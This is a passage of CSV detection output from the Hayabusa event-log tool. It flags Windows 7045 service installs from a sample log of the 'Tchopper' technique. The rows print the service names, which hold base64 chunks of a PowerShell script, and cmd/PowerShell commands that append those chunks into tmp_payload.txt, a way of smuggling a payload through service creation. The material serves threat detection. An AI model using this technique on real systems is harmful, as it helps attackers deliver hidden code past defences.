-Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:45.277 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:45.277 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:46.746 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:46.746 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:46.746 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:48.200 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:48.200 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:48.200 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:49.641 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:49.641 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:49.641 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:51.086 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:51.086 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:51.086 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:52.536 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:52.536 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:52.536 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:54.010 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:54.010 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:54.010 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:55.527 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:55.527 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:55.527 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:57.001 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:57.001 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:57.001 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:58.464 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:58.464 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:58.464 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:59.902 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:59.902 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:59.902 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:01.359 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:01.359 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:01.359 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:02.829 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:02.829 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:21:02.829 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly 